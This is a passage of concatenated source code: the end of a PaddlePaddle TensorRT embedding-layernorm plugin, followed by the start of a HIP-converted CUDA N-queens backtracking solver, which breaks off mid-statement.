ret; ret.nbDims = 4; ret.d[0] = inputs[1].d[0]; // sum of seq length ret.d[1] = exprBuilder.constant(mLd); ret.d[2] = exprBuilder.constant(1); ret.d[3] = exprBuilder.constant(1); return ret; } else { nvinfer1::DimsExprs ret; ret.nbDims = 1; ret.d[0] = inputs[nbInputs - 1].d[1]; // mask id: max seqlen return ret; } } bool EmbLayerNormVarSeqlenPluginBase::supportsFormatCombination( int32_t pos, nvinfer1::PluginTensorDesc const* inOut, int32_t nbInputs, int32_t nbOutputs) noexcept { assert(nbOutputs == 3); nvinfer1::PluginTensorDesc const& desc = inOut[pos]; if (desc.format != nvinfer1::TensorFormat::kLINEAR) { return false; } if (pos == 0) { // pos_id return desc.dims.nbDims == 1 && desc.type == nvinfer1::DataType::kINT32; } if (pos == 1) { // input_id return desc.dims.nbDims == 1 && desc.type == nvinfer1::DataType::kINT32; } nvinfer1::PluginTensorDesc const& prev = inOut[1]; // input_ids if (1 < pos && pos < (nbInputs - 1)) { // other ids: check it's the same as input_ids return desc.type == prev.type && desc.dims.nbDims == 1 && desc.dims.d[0] == prev.dims.d[0]; } if (pos == nbInputs - 1) { // mask id return desc.type == mType; } // embedded sequence if (pos == nbInputs) { return desc.type == mType && desc.dims.nbDims == 4 && desc.dims.d[0] == inOut[1].dims.d[0] && desc.dims.d[2] == 1 && desc.dims.d[3] == 1; } // mask(HFace) or pre_layernorm_bias(MTron) if (pos == nbInputs + 1) { return desc.type == mType; } // max seqlen if (pos == nbInputs + 2) { return desc.type == mType; } } void checkConfigurationInputs(nvinfer1::DynamicPluginTensorDesc const* inputs, int32_t nbInputs, nvinfer1::DynamicPluginTensorDesc const* outputs, int32_t nbOutputs) noexcept { // Validate input arguments assert(nbOutputs == 3); assert(inputs[0].desc.dims.nbDims == 1); assert(inputs[0].desc.type == nvinfer1::DataType::kINT32); for (int i = 1; i < nbInputs - 1; ++i) { assert(inputs[i].desc.dims.nbDims == 1); assert(inputs[i].desc.dims.d[0] == inputs[1].desc.dims.d[0]); assert(inputs[i].desc.type == nvinfer1::DataType::kINT32); } assert(outputs[0].desc.dims.nbDims == 4); assert(static_cast<size_t>(outputs[0].desc.dims.d[0]) == static_cast<size_t>(inputs[1].desc.dims.d[0])); assert(outputs[0].desc.dims.d[2] == 1); assert(outputs[0].desc.dims.d[3] == 1); } void EmbLayerNormVarSeqlenPluginHFace::configurePlugin( nvinfer1::DynamicPluginTensorDesc const* inputs, int32_t nbInputs, nvinfer1::DynamicPluginTensorDesc const* outputs, int32_t nbOutputs) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace configurePlugin"); checkConfigurationInputs(inputs, nbInputs, outputs, nbOutputs); assert(static_cast<size_t>(outputs[0].desc.dims.d[1]) == static_cast<size_t>(mLd)); int32_t const B = inputs[0].desc.dims.d[0] - 1; // check mask assert(outputs[1].desc.dims.nbDims == 2); if (B > 0) { assert(outputs[1].desc.dims.d[0] == B); } assert((outputs[1].desc.dims.d[1] == 2 * packedMaskSize384) || (outputs[1].desc.dims.d[1] == 2 * packedMaskSize128) || (outputs[1].desc.dims.d[1] == 2 * packedMaskSize256)); assert(outputs[0].desc.type == mType); assert(outputs[1].desc.type == nvinfer1::DataType::kHALF); } void EmbLayerNormVarSeqlenPluginMTron::configurePlugin( nvinfer1::DynamicPluginTensorDesc const* inputs, int32_t nbInputs, nvinfer1::DynamicPluginTensorDesc const* outputs, int32_t nbOutputs) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron configurePlugin"); checkConfigurationInputs(inputs, nbInputs, outputs, nbOutputs); assert(static_cast<size_t>(outputs[0].desc.dims.d[1]) == static_cast<size_t>(mLd)); assert(outputs[1].desc.dims.nbDims == 4); assert(static_cast<size_t>(outputs[1].desc.dims.d[0]) == static_cast<size_t>(inputs[1].desc.dims.d[0])); assert(static_cast<size_t>(outputs[1].desc.dims.d[1]) == static_cast<size_t>(mLd)); assert(outputs[1].desc.dims.d[2] == 1); assert(outputs[1].desc.dims.d[3] == 1); assert(outputs[0].desc.type == mType); assert(outputs[1].desc.type == mType); } size_t EmbLayerNormVarSeqlenPluginBase::getWorkspaceSize( nvinfer1::PluginTensorDesc const* inputs, int32_t nbInputs, nvinfer1::PluginTensorDesc const* outputs, int32_t nbOutputs) const noexcept { return 0; } int32_t EmbLayerNormVarSeqlenPluginHFace::enqueue( nvinfer1::PluginTensorDesc const* inputDesc, nvinfer1::PluginTensorDesc const* outputDesc, void const* const* inputs, void* const* outputs, void* workspace, cudaStream_t stream) noexcept { int32_t batchSize = inputDesc[0].dims.d[0] - 1; // read out the maximum sequence length from the dummy input int32_t const maxSeqlen = inputDesc[nbLookupTables_].dims.d[0]; int32_t S = 384; if (maxSeqlen <= 128) { S = 128; } else if (maxSeqlen <= 192) { S = 192; } else if (maxSeqlen <= 256) { S = 256; } const float* beta = mBetaDev.get(); const float* gamma = mGammaDev.get(); if (mType == nvinfer1::DataType::kFLOAT) { auto output = static_cast<float*>(outputs[0]); if (nbLookupTables_ == 2) { return embSkipLayerNormHFace_2<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output); } else if (nbLookupTables_ == 3) { return embSkipLayerNormHFace_3<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output); } else if (nbLookupTables_ == 4) { return embSkipLayerNormHFace_4<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), static_cast<int32_t const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), static_cast<float const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else if (mType == nvinfer1::DataType::kHALF) { auto output = static_cast<half*>(outputs[0]); if (nbLookupTables_ == 2) { return embSkipLayerNormHFace_2<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output); } else if (nbLookupTables_ == 3) { return embSkipLayerNormHFace_3<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output); } else if (nbLookupTables_ == 4) { return embSkipLayerNormHFace_4<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), static_cast<int32_t const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), static_cast<half const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else { PADDLE_THROW(platform::errors::InvalidArgument( "Unsupported type error, expected [kHALF,kFLOAT]")); } return STATUS_SUCCESS; } int32_t EmbLayerNormVarSeqlenPluginMTron::enqueue( nvinfer1::PluginTensorDesc const* inputDesc, nvinfer1::PluginTensorDesc const* outputDesc, void const* const* inputs, void* const* outputs, void* workspace, cudaStream_t stream) noexcept { int32_t batchSize = inputDesc[0].dims.d[0] - 1; // read out the maximum sequence length from the dummy input int32_t const maxSeqlen = inputDesc[nbLookupTables_].dims.d[0]; int32_t S = 384; if (maxSeqlen <= 128) { S = 128; } else if (maxSeqlen <= 192) { S = 192; } else if (maxSeqlen <= 256) { S = 256; } const float* beta = mBetaDev.get(); const float* gamma = mGammaDev.get(); if (mType == nvinfer1::DataType::kFLOAT) { auto output = static_cast<float*>(outputs[0]); auto skip = static_cast<float*>(outputs[1]); if (nbLookupTables_ == 2) { return embSkipLayerNormMTron_2<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output, skip); } else if (nbLookupTables_ == 3) { return embSkipLayerNormMTron_3<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output, skip); } else if (nbLookupTables_ == 4) { return embSkipLayerNormMTron_4<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), static_cast<int32_t const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), static_cast<float const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output, skip); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else if (mType == nvinfer1::DataType::kHALF) { auto output = static_cast<half*>(outputs[0]); auto skip = static_cast<half*>(outputs[1]); if (nbLookupTables_ == 2) { return embSkipLayerNormMTron_2<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output, skip); } else if (nbLookupTables_ == 3) { return embSkipLayerNormMTron_3<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output, skip); } else if (nbLookupTables_ == 4) { return embSkipLayerNormMTron_4<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), static_cast<int32_t const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), static_cast<half const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output, skip); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else { PADDLE_THROW(platform::errors::InvalidArgument( "Unsupported type error, expected [kHALF,kFLOAT]")); } return STATUS_SUCCESS; } // IPluginV2Ext Methods nvinfer1::DataType EmbLayerNormVarSeqlenPluginBase::getOutputDataType( int32_t index, nvinfer1::DataType const* inputTypes, int32_t nbInputs) const noexcept { assert(index == 0 || index == 1); if (index == 0) { assert(mType == nvinfer1::DataType::kHALF || mType == nvinfer1::DataType::kFLOAT); return mType; } return nvinfer1::DataType::kHALF; } // IPluginV2 Methods char const* EmbLayerNormVarSeqlenPluginBase::getPluginType() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_NAME; } char const* EmbLayerNormVarSeqlenPluginHFace::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_HFACE; } char const* EmbLayerNormVarSeqlenPluginMTron::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_MTRON; } int32_t EmbLayerNormVarSeqlenPluginBase::getNbOutputs() const noexcept { return 3; } int32_t EmbLayerNormVarSeqlenPluginHFace::initialize() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace initialize"); return 0; } int32_t EmbLayerNormVarSeqlenPluginMTron::initialize() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron initialize"); return 0; } void EmbLayerNormVarSeqlenPluginHFace::terminate() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace terminate"); } void EmbLayerNormVarSeqlenPluginMTron::terminate() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron terminate"); } size_t EmbLayerNormVarSeqlenPluginBase::getSerializationSize() const noexcept { size_t const wordSize = getElementSize(mType); return 2 * sizeof(float) * mLd // beta + gamma + sizeof(mType) // + sizeof(mLd) // + mIdsVocabSize.size() * sizeof(mIdsVocabSize[0]) // + wordSize * mLd * accumulate( mIdsVocabSize.begin(), mIdsVocabSize.end(), 0) // ids emb + sizeof(nbLookupTables_); // numbers of lookup_table } void EmbLayerNormVarSeqlenPluginBase::serialize(void* buffer) const noexcept { serialize_value(&buffer, mType); serialize_value(&buffer, mLd); serialize_value(&buffer, nbLookupTables_); for (size_t i = 0; i < mIdsVocabSize.size(); ++i) { serialize_value(&buffer, mIdsVocabSize[i]); } char* d = static_cast<char*>(buffer); size_t const wordSize = getElementSize(mType); serFromDev(&d, mBetaDev.get(), mLd); serFromDev(&d, mGammaDev.get(), mLd); for (size_t i = 0; i < mIdsEmbPtrs.size(); ++i) { serFromDev(&d, static_cast<char*>(mIdsEmbPtrs[i]), mLd * mIdsVocabSize[i] * wordSize); } } void EmbLayerNormVarSeqlenPluginBase::destroy() noexcept { // This gets called when the network containing plugin is destroyed mBetaDev.reset(nullptr); mGammaDev.reset(nullptr); for (size_t i = 0; i < mIdsEmbPtrs.size(); ++i) { cudaFree(mIdsEmbPtrs[i]); } delete this; } void EmbLayerNormVarSeqlenPluginHFace::destroy() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace destroy"); EmbLayerNormVarSeqlenPluginBase::destroy(); } void EmbLayerNormVarSeqlenPluginMTron::destroy() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron destroy"); EmbLayerNormVarSeqlenPluginBase::destroy(); } void EmbLayerNormVarSeqlenPluginBase::setPluginNamespace( char const* libNamespace) noexcept { mNamespace = libNamespace; } char const* EmbLayerNormVarSeqlenPluginBase::getPluginNamespace() const noexcept { return mNamespace.c_str(); } EmbLayerNormVarSeqlenPluginBaseCreator:: EmbLayerNormVarSeqlenPluginBaseCreator() {} char const* EmbLayerNormVarSeqlenPluginBaseCreator::getPluginName() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_NAME; } char const* EmbLayerNormVarSeqlenPluginHFaceCreator::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_HFACE; } char const* EmbLayerNormVarSeqlenPluginMTronCreator::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_MTRON; } nvinfer1::PluginFieldCollection const* EmbLayerNormVarSeqlenPluginBaseCreator::getFieldNames() noexcept { return &mFC; } bool initializeFields(nvinfer1::PluginFieldCollection const* fc, nvinfer1::Weights* beta, nvinfer1::Weights* gamma, std::vector<nvinfer1::Weights>* IdsEmb) { bool output_fp16 = false; for (int32_t i = 0; i < fc->nbFields; i++) { std::string field_name(fc->fields[i].name); if (field_name.compare("bert_embeddings_layernorm_beta") == 0) { TRANSFORMER_DEBUG_MSG("Building bert_embeddings_layernorm_beta..."); beta->values = fc->fields[i].data; beta->count = fc->fields[i].length; beta->type = fieldTypeToDataType(fc->fields[i].type); } if (field_name.compare("bert_embeddings_layernorm_gamma") == 0) { TRANSFORMER_DEBUG_MSG("Building bert_embeddings_layernorm_gamma..."); gamma->values = fc->fields[i].data; gamma->count = fc->fields[i].length; gamma->type = fieldTypeToDataType(fc->fields[i].type); } if (field_name.compare("output_fp16") == 0) { TRANSFORMER_DEBUG_MSG("Building output_fp16..."); assert(fc->fields[i].type == nvinfer1::PluginFieldType::kINT32); output_fp16 = static_cast<int32_t const*>(fc->fields[i].data)[0] != 0; } if (field_name.compare("bert_embeddings_word_embeddings_" + std::to_string(i - 3)) == 0) { TRANSFORMER_DEBUG_MSG( ("bert_embeddings_word_embeddings_" + std::to_string(i - 3)).c_str()); nvinfer1::Weights tem; tem.values = fc->fields[i].data; tem.count = fc->fields[i].length; tem.type = fieldTypeToDataType(fc->fields[i].type); IdsEmb->push_back(tem); } } return output_fp16; } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginHFaceCreator::createPlugin( char const* name, nvinfer1::PluginFieldCollection const* fc) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenHFace createPlugin"); nvinfer1::Weights beta; nvinfer1::Weights gamma; std::vector<nvinfer1::Weights> IdsEmb; bool output_fp16 = initializeFields(fc, &beta, &gamma, &IdsEmb); TRANSFORMER_DEBUG_MSG("Building the Plugin..."); EmbLayerNormVarSeqlenPluginHFace* p = new EmbLayerNormVarSeqlenPluginHFace( name, output_fp16 ? nvinfer1::DataType::kHALF : nvinfer1::DataType::kFLOAT, beta, gamma, IdsEmb); return p; } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginMTronCreator::createPlugin( char const* name, nvinfer1::PluginFieldCollection const* fc) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenMTron createPlugin"); nvinfer1::Weights beta; nvinfer1::Weights gamma; std::vector<nvinfer1::Weights> IdsEmb; bool output_fp16 = initializeFields(fc, &beta, &gamma, &IdsEmb); TRANSFORMER_DEBUG_MSG("Building the Plugin..."); EmbLayerNormVarSeqlenPluginMTron* p = new EmbLayerNormVarSeqlenPluginMTron( name, output_fp16 ? nvinfer1::DataType::kHALF : nvinfer1::DataType::kFLOAT, beta, gamma, IdsEmb); return p; } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginHFaceCreator::deserializePlugin( char const* name, void const* serialData, size_t serialLength) noexcept { return new EmbLayerNormVarSeqlenPluginHFace(name, serialData, serialLength); } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginMTronCreator::deserializePlugin( char const* name, void const* serialData, size_t serialLength) noexcept { return new EmbLayerNormVarSeqlenPluginMTron(name, serialData, serialLength); } void EmbLayerNormVarSeqlenPluginBaseCreator::setPluginNamespace( char const* libNamespace) noexcept { mNamespace = libNamespace; } char const* EmbLayerNormVarSeqlenPluginBaseCreator::getPluginNamespace() const noexcept { return mNamespace.c_str(); } } // namespace plugin } // namespace tensorrt } // namespace inference } // namespace paddle
122f8e2edebd52308521259b8f2f8588ac61c46e.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" // N-queen for CUDA // // Copyright(c) 2008 Ping-Che Chen //#define WIN32_LEAN_AND_MEAN //#include <windows.h> #include <stdio.h> #include <cutil.h> #define THREAD_NUM 96 int bunk = 0; // this is a dummy variable used for making sure clock() are not optimized out /* * ---------------------------------------------------------------- * This is a recursive version of n-queen backtracking solver. * A non-recursive version is used instead. * ---------------------------------------------------------------- long long solve_nqueen_internal(int n, unsigned int mask, unsigned int l_mask, unsigned int r_mask, unsigned int t_mask) { if(mask == t_mask) { return 1; } unsigned int m = (mask | l_mask | r_mask); if((m & t_mask) == t_mask) { return 0; } long long total = 0; unsigned int index = (m + 1) & ~m; while((index & t_mask) != 0) { total += solve_nqueen_internal(mask | index, (l_mask | index) << 1, (r_mask | index) >> 1, t_mask); m |= index; index = (m + 1) & ~m; } return total; } long long solve_nqueen(int n) { return solve_nqueen_internal(0, 0, 0, (1 << n) - 1); } */ /* ------------------------------------------------------------------- * This is a non-recursive version of n-queen backtracking solver. * This provides the basis for the CUDA version. * ------------------------------------------------------------------- */ long long solve_nqueen(int n) { unsigned int mask[32]; unsigned int l_mask[32]; unsigned int r_mask[32]; unsigned int m[32]; if(n <= 0 || n > 32) { return 0; } const unsigned int t_mask = (1 << n) - 1; long long total = 0; long long upper_total = 0; int i = 0, j; unsigned int index; mask[0] = 0; l_mask[0] = 0; r_mask[0] = 0; m[0] = 0; for(j = 0; j < (n + 1) / 2; j++) { index = (1 << j); m[0] |= index; mask[1] = index; l_mask[1] = index << 1; r_mask[1] = index >> 1; m[1] = (mask[1] | l_mask[1] | r_mask[1]); i = 1; if(n % 2 == 1 && j == (n + 1) / 2 - 1) { upper_total = total; total = 0; } while(i > 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = ((m[i] + 1) ^ m[i]) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { if(i + 1 == n) { total++; i--; } else { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; } } else { i --; } } } } bunk = 2; if(n % 2 == 0) { return total * 2; } else { return upper_total * 2 + total; } } /* ------------------------------------------------------------------- * This is a non-recursive version of n-queen backtracking solver * with multi-thread support. * ------------------------------------------------------------------- */ /* struct thread_context { HANDLE thread; bool stop; long long total; int n; unsigned int mask; unsigned int l_mask; unsigned int r_mask; unsigned int t_mask; HANDLE ready; HANDLE complete; }; DWORD WINAPI solve_nqueen_proc(LPVOID param) { thread_context* ctx = (thread_context*) param; unsigned int mask[32]; unsigned int l_mask[32]; unsigned int r_mask[32]; unsigned int m[32]; unsigned int t_mask; long long total; unsigned int index; unsigned int mark; for(;;) { WaitForSingleObject(ctx->ready, INFINITE); if(ctx->stop) { break; } int i = 0; mask[0] = ctx->mask; l_mask[0] = ctx->l_mask; r_mask[0] = ctx->r_mask; m[0] = mask[0] | l_mask[0] | r_mask[0]; total = 0; t_mask = ctx->t_mask; mark = ctx->n; while(i >= 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = (m[i] + 1) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { if(i + 1 == mark) { total++; i--; } else { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; } } else { i --; } } } ctx->total = total; SetEvent(ctx->complete); } return 0; } long long solve_nqueen_mcpu(int n) { if(n <= 0 || n > 32) { return 0; } SYSTEM_INFO info; thread_context* threads; int num_threads; GetSystemInfo(&info); num_threads = info.dwNumberOfProcessors; if(num_threads == 1) { // only one cpu found, use single thread version return solve_nqueen(n); } threads = new thread_context[num_threads]; int j; for(j = 0; j < num_threads; j++) { threads[j].stop = false; threads[j].ready = CreateEvent(0, FALSE, FALSE, 0); threads[j].complete = CreateEvent(0, FALSE, TRUE, 0); threads[j].thread = CreateThread(0, 0, solve_nqueen_proc, threads + j, 0, 0); threads[j].total = 0; } int thread_idx = 0; const unsigned int t_mask = (1 << n) - 1; long long total = 0; unsigned int index; unsigned int m_mask = 0; if(n % 2 == 1) { m_mask = 1 << ((n + 1) / 2 - 1); } for(j = 0; j < (n + 1) / 2; j++) { index = 1 << j; WaitForSingleObject(threads[thread_idx].complete, INFINITE); if(threads[thread_idx].mask != m_mask) { total += threads[thread_idx].total * 2; } else { total += threads[thread_idx].total; } threads[thread_idx].mask = index; threads[thread_idx].l_mask = index << 1; threads[thread_idx].r_mask = index >> 1; threads[thread_idx].t_mask = t_mask; threads[thread_idx].total = 0; threads[thread_idx].n = n - 1; SetEvent(threads[thread_idx].ready); thread_idx = (thread_idx + 1) % num_threads; } // collect all threads... HANDLE* events = new HANDLE[num_threads]; for(j = 0; j < num_threads; j++) { events[j] = threads[j].complete; } WaitForMultipleObjects(num_threads, events, TRUE, INFINITE); for(j = 0; j < num_threads; j++) { if(threads[j].mask != m_mask) { total += threads[j].total * 2; } else { total += threads[j].total; } threads[j].stop = true; SetEvent(threads[j].ready); events[j] = threads[j].thread; } WaitForMultipleObjects(num_threads, events, TRUE, INFINITE); for(j = 0; j < num_threads; j++) { CloseHandle(threads[j].thread); CloseHandle(threads[j].ready); CloseHandle(threads[j].complete); } delete[] threads; delete[] events; bunk = 3; return total; } */ /* -------------------------------------------------------------------------- * This is a non-recursive version of n-queen backtracking solver for CUDA. * It receives multiple initial conditions from a CPU iterator, and count * each conditions. * -------------------------------------------------------------------------- */ __global__ void solve_nqueen_cuda_kernel(int n, int mark, unsigned int* total_masks, unsigned int* total_l_masks, unsigned int* total_r_masks, unsigned int* results, int total_conditions) { const int tid = threadIdx.x; const int bid = blockIdx.x; const int idx = bid * blockDim.x + tid; __shared__ unsigned int mask[THREAD_NUM][10]; __shared__ unsigned int l_mask[THREAD_NUM][10]; __shared__ unsigned int r_mask[THREAD_NUM][10]; __shared__ unsigned int m[THREAD_NUM][10]; __shared__ unsigned int sum[THREAD_NUM]; const unsigned int t_mask = (1 << n) - 1; int total = 0; int i = 0; unsigned int index; if(idx < total_conditions) { mask[tid][i] = total_masks[idx]; l_mask[tid][i] = total_l_masks[idx]; r_mask[tid][i] = total_r_masks[idx]; m[tid][i] = mask[tid][i] | l_mask[tid][i] | r_mask[tid][i]; while(i >= 0) { if((m[tid][i] & t_mask) == t_mask) { i--; } else { index = (m[tid][i] + 1) & ~m[tid][i]; m[tid][i] |= index; if((index & t_mask) != 0) { if(i + 1 == mark) { total++; i--; } else { mask[tid][i + 1] = mask[tid][i] | index; l_mask[tid][i + 1] = (l_mask[tid][i] | index) << 1; r_mask[tid][i + 1] = (r_mask[tid][i] | index) >> 1; m[tid][i + 1] = (mask[tid][i + 1] | l_mask[tid][i + 1] | r_mask[tid][i + 1]); i++; } } else { i --; } } } sum[tid] = total; } else { sum[tid] = 0; } __syncthreads(); // reduction if(tid < 64 && tid + 64 < THREAD_NUM) { sum[tid] += sum[tid + 64]; } __syncthreads(); if(tid < 32) { sum[tid] += sum[tid + 32]; } __syncthreads(); if(tid < 16) { sum[tid] += sum[tid + 16]; } __syncthreads(); if(tid < 8) { sum[tid] += sum[tid + 8]; } __syncthreads(); if(tid < 4) { sum[tid] += sum[tid + 4]; } __syncthreads(); if(tid < 2) { sum[tid] += sum[tid + 2]; } __syncthreads(); if(tid < 1) { sum[tid] += sum[tid + 1]; } __syncthreads(); if(tid == 0) { results[bid] = sum[0]; } } long long solve_nqueen_cuda(int n, int steps) { // generating start conditions unsigned int mask[32]; unsigned int l_mask[32]; unsigned int r_mask[32]; unsigned int m[32]; unsigned int index; if(n <= 0 || n > 32) { return 0; } unsigned int* total_masks = new unsigned int[steps]; unsigned int* total_l_masks = new unsigned int[steps]; unsigned int* total_r_masks = new unsigned int[steps]; unsigned int* results = new unsigned int[steps]; unsigned int* masks_cuda; unsigned int* l_masks_cuda; unsigned int* r_masks_cuda; unsigned int* results_cuda; hipMalloc((void**) &masks_cuda, sizeof(int) * steps); hipMalloc((void**) &l_masks_cuda, sizeof(int) * steps); hipMalloc((void**) &r_masks_cuda, sizeof(int) * steps); hipMalloc((void**) &results_cuda, sizeof(int) * steps / THREAD_NUM); const unsigned int t_mask = (1 << n) - 1; const unsigned int mark = n > 11 ? n - 10 : 2; long long total = 0; int total_conditions = 0; int i = 0, j; mask[0] = 0; l_mask[0] = 0; r_mask[0] = 0; m[0] = 0; bool computed = false; for(j = 0; j < n / 2; j++) { index = (1 << j); m[0] |= index; mask[1] = index; l_mask[1] = index << 1; r_mask[1] = index >> 1; m[1] = (mask[1] | l_mask[1] | r_mask[1]); i = 1; while(i > 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = (m[i] + 1) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; if(i == mark) { total_masks[total_conditions] = mask[i]; total_l_masks[total_conditions] = l_mask[i]; total_r_masks[total_conditions] = r_mask[i]; total_conditions++; if(total_conditions == steps) { if(computed) { hipMemcpy(results, results_cuda, 